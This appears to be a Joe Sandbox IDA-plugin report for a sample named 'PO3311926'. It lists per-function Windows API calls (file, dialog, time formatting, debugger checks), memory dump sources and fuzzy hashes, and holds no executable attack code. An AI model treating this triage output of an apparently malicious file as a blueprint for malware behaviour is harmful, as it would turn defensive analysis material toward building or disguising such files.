                                                                                                • Part of subcall function 00BA1316: SetWindowTextW.USER32(00000000,00BD35F4), ref: 00BA1370
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BBC2B1
                                                                                              • EndDialog.USER32(?,00000006), ref: 00BBC2C4
                                                                                              • GetDlgItem.USER32(?,0000006C), ref: 00BBC2E0
                                                                                              • SetFocus.USER32(00000000), ref: 00BBC2E7
                                                                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 00BBC321
                                                                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BBC358
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00BBC36E
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC38C
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC39C
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BBC3B8
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BBC3D4
                                                                                              • _swprintf.LIBCMT ref: 00BBC404
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BBC417
                                                                                              • FindClose.KERNEL32(00000000), ref: 00BBC41E
                                                                                              • _swprintf.LIBCMT ref: 00BBC477
                                                                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 00BBC48A
                                                                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BBC4A7
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BBC4C7
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC4D7
                                                                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BBC4F1
                                                                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BBC509
                                                                                              • _swprintf.LIBCMT ref: 00BBC535
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BBC548
                                                                                              • _swprintf.LIBCMT ref: 00BBC59C
                                                                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 00BBC5AF
                                                                                                • Part of subcall function 00BBAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BBAF35
                                                                                                • Part of subcall function 00BBAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00BDE72C,?,?), ref: 00BBAF84
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                              • API String ID: 797121971-1840816070
                                                                                              • Opcode ID: da89b3ed59feb383d12f48e4dcf96c756c54acbfae94f76861113474628acc34
                                                                                              • Instruction ID: 5094752ba9c9dfd44127d9274e343ebbdf9bd91e6ddc4379684da3817d573cdd
                                                                                              • Opcode Fuzzy Hash: da89b3ed59feb383d12f48e4dcf96c756c54acbfae94f76861113474628acc34
                                                                                              • Instruction Fuzzy Hash: 94916272548344BBD221DBA4CC49FFF7BECEB4AB00F04485AB649D6091EBB5A6048762
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA6FAA
                                                                                              • _wcslen.LIBCMT ref: 00BA7013
                                                                                              • _wcslen.LIBCMT ref: 00BA7084
                                                                                                • Part of subcall function 00BA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7AAB
                                                                                                • Part of subcall function 00BA7A9C: GetLastError.KERNEL32 ref: 00BA7AF1
                                                                                                • Part of subcall function 00BA7A9C: CloseHandle.KERNEL32(?), ref: 00BA7B00
                                                                                                • Part of subcall function 00BAA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641,000000FF), ref: 00BAA1F1
                                                                                                • Part of subcall function 00BAA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641), ref: 00BAA21F
                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BA7139
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00BA7155
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BA7298
                                                                                                • Part of subcall function 00BA9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BA73BC,?,?,?,00000000), ref: 00BA9DBC
                                                                                                • Part of subcall function 00BA9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BA9E70
                                                                                                • Part of subcall function 00BA9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00BA95D6,?,?,?,?,?,00BD2641,000000FF), ref: 00BA963B
                                                                                                • Part of subcall function 00BAA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA501
                                                                                                • Part of subcall function 00BAA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA532
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                              • API String ID: 2821348736-3508440684
                                                                                              • Opcode ID: d57e2f49bd5a8418f75ce5d14a751a5bbd35fb7f0f4078296447abf3effa7cca
                                                                                              • Instruction ID: af615325eedd3d210b6a26f6ccd16492fd5d144cce7017e4fd002eca0ad86985
                                                                                              • Opcode Fuzzy Hash: d57e2f49bd5a8418f75ce5d14a751a5bbd35fb7f0f4078296447abf3effa7cca
                                                                                              • Instruction Fuzzy Hash: F2C1C67194C644AEDB21DB74CC91FEEB3E8EF06700F00459AF956E7182EB74AA44CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: 0612c478a024562e36647fb5d850066f157686397077ea71e91b8e545256b419
                                                                                              • Instruction ID: 10783829229bcb43d8d76bfdd58717a035a1804e95ce12bae2ae717a316b5587
                                                                                              • Opcode Fuzzy Hash: 0612c478a024562e36647fb5d850066f157686397077ea71e91b8e545256b419
                                                                                              • Instruction Fuzzy Hash: 32C21871E086298FDB25CE289D80BEAB7F5EB84305F1541EED45EE7240E775AE818F40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog_swprintf
                                                                                              • String ID: CMT$h%u$hc%u
                                                                                              • API String ID: 146138363-3282847064
                                                                                              • Opcode ID: 303f8fec31f4fec33c523b5d11b0a7a04e5d1ac56ae3441f63456b1b3db5464a
                                                                                              • Instruction ID: 3f065d3fd02dbe9818ba8738784531f0600c0cc31858f540ed78653ca80bf10a
                                                                                              • Opcode Fuzzy Hash: 303f8fec31f4fec33c523b5d11b0a7a04e5d1ac56ae3441f63456b1b3db5464a
                                                                                              • Instruction Fuzzy Hash: 0B32C571518384AFDB14DF74C895AEA3BE5EF16700F4404BDFD8A8B282DB749A49CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00BA2874
                                                                                              • _strlen.LIBCMT ref: 00BA2E3F
                                                                                                • Part of subcall function 00BB02BA: __EH_prolog.LIBCMT ref: 00BB02BF
                                                                                                • Part of subcall function 00BB1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00BABAE9,00000000,?,?,?,0001042E), ref: 00BB1BA0
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BA2F91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1206968400-2756464174
                                                                                              • Opcode ID: 29f9ba5a6dae661a3ccfaae6114dca33a4ba1cbab49a52acd7b4a3aacfb7347b
                                                                                              • Instruction ID: 0f6224b07620759e7c9a8c5bb17493506375610cf4f2501b665e165b055a8db1
                                                                                              • Opcode Fuzzy Hash: 29f9ba5a6dae661a3ccfaae6114dca33a4ba1cbab49a52acd7b4a3aacfb7347b
                                                                                              • Instruction Fuzzy Hash: 0C62F6715083458FDB19DF38C8967EA3BE1EF56300F0845BEEC9A8B282D7759945CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BBF844
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00BBF910
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BBF930
                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00BBF93A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                              • String ID:
                                                                                              • API String ID: 254469556-0
                                                                                              • Opcode ID: 15e66de92e14a6402e5f01140ea6bff7309b31d39fd3a1ceb2dbd302c44f9603
                                                                                              • Instruction ID: c34ff8c116f9298ab999a6c4f7e00c8c29a2005f5a6d439db4633fb23895b61e
                                                                                              • Opcode Fuzzy Hash: 15e66de92e14a6402e5f01140ea6bff7309b31d39fd3a1ceb2dbd302c44f9603
                                                                                              • Instruction Fuzzy Hash: 78310975D0621A9BDB10DFA4DD897DCBBF8AF04704F1040EAE40CA7250EBB19A848F45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualQuery.KERNEL32(80000000,00BBE5E8,0000001C,00BBE7DD,00000000,?,?,?,?,?,?,?,00BBE5E8,00000004,00C01CEC,00BBE86D), ref: 00BBE6B4
                                                                                              • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00BBE5E8,00000004,00C01CEC,00BBE86D), ref: 00BBE6CF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoQuerySystemVirtual
                                                                                              • String ID: D
                                                                                              • API String ID: 401686933-2746444292
                                                                                              • Opcode ID: 32c60f6d9944902aaa32aedcaefb8ce2ce8dcd38ecd253c1937bf5ad1a3e8047
                                                                                              • Instruction ID: 4c9d2eb15e021f8f47c32d020e7876b21cdd5f8fb52b70c6ecaae6474daae4c3
                                                                                              • Opcode Fuzzy Hash: 32c60f6d9944902aaa32aedcaefb8ce2ce8dcd38ecd253c1937bf5ad1a3e8047
                                                                                              • Instruction Fuzzy Hash: 9C01F7326001096BDB14DE29DC09BED7BEAEFC4324F0CC161ED29D7251EA78ED058680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BC8FB5
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BC8FBF
                                                                                              • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00BC8FCC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                              • String ID:
                                                                                              • API String ID: 3906539128-0
                                                                                              • Opcode ID: d62cf3a2dfc31358e06db25de12eba0412aa99c00e3a29064ee8bf3f66cda326
                                                                                              • Instruction ID: a60a8bd898a618883a2d63cd3d17d8cbc607e56d6ea968bd980ad7f228f22e08
                                                                                              • Opcode Fuzzy Hash: d62cf3a2dfc31358e06db25de12eba0412aa99c00e3a29064ee8bf3f66cda326
                                                                                              • Instruction Fuzzy Hash: 1631A275901229ABCB21DF68DC89B99BBF8EF08710F5041EAE41CA7251EB709F858F45
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: .
                                                                                              • API String ID: 0-248832578
                                                                                              • Opcode ID: ebed6f6b1864a2bdde05b185244823912acfc957b70c50dd67a14627fe2e9340
                                                                                              • Instruction ID: 6badab9c90291defed2f65de80366a45cb7922c6944771e59efda8e280f71e55
                                                                                              • Opcode Fuzzy Hash: ebed6f6b1864a2bdde05b185244823912acfc957b70c50dd67a14627fe2e9340
                                                                                              • Instruction Fuzzy Hash: 8F31D072900249ABCB289E78CC86EFEBBFDDB85314F1441ECE91997252E7309E458B50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                              • Instruction ID: 931d7577ae094b8bc69bf4a28a916954b72a4af03cde571d170252592a26e157
                                                                                              • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                              • Instruction Fuzzy Hash: 8902FA75E002199BDF14DFA9C980BADB7F1EF88314F2582AED919E7384D731AD418B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BBAF35
                                                                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,00BDE72C,?,?), ref: 00BBAF84
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: c382748f7e8c55979ac4019f0573a9a4095e623ea892a9187c1025790f289e37
                                                                                              • Instruction ID: d6b7f322473fbb1e2a158a5eb27c6c6b0c2a58464f7f2fd00845e1df08e10758
                                                                                              • Opcode Fuzzy Hash: c382748f7e8c55979ac4019f0573a9a4095e623ea892a9187c1025790f289e37
                                                                                              • Instruction Fuzzy Hash: 4C015A7A200319AAD7109F64EC45FAAB7F8EF08750F004062FB15AB2A1E770A954CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00BA6DDF,00000000,00000400), ref: 00BA6C74
                                                                                              • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00BA6C95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFormatLastMessage
                                                                                              • String ID:
                                                                                              • API String ID: 3479602957-0
                                                                                              • Opcode ID: 9186b710c6439e50c860a44aa570031e6a3f1cb41408f49e41aac216714ad750
                                                                                              • Instruction ID: 025b85954da9b549fc54c9a4250768ca9b059c4b9af928350b3c057c3ca8d399
                                                                                              • Opcode Fuzzy Hash: 9186b710c6439e50c860a44aa570031e6a3f1cb41408f49e41aac216714ad750
                                                                                              • Instruction Fuzzy Hash: 39D0A970348300BFFA000B218C16F2ABBDAFF52F61F18C014B380E90E1EA708420A62A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BD19EF,?,?,00000008,?,?,00BD168F,00000000), ref: 00BD1C21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionRaise
                                                                                              • String ID:
                                                                                              • API String ID: 3997070919-0
                                                                                              • Opcode ID: fa1e8cd3dd50d1a8efe2d54ac9ba433a869bd503d2351c5124eb7119266c60fd
                                                                                              • Instruction ID: 8d48a5bd6ae96de4a9573cda43ce9644421f23df7e0229d8243a7fb373007807
                                                                                              • Opcode Fuzzy Hash: fa1e8cd3dd50d1a8efe2d54ac9ba433a869bd503d2351c5124eb7119266c60fd
                                                                                              • Instruction Fuzzy Hash: 69B14F35210609AFD719CF2CC486B65BBE0FF45364F298A9AE899CF3A1D335D991CB40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00BBF66A
                                                                                              Memory Dump Source
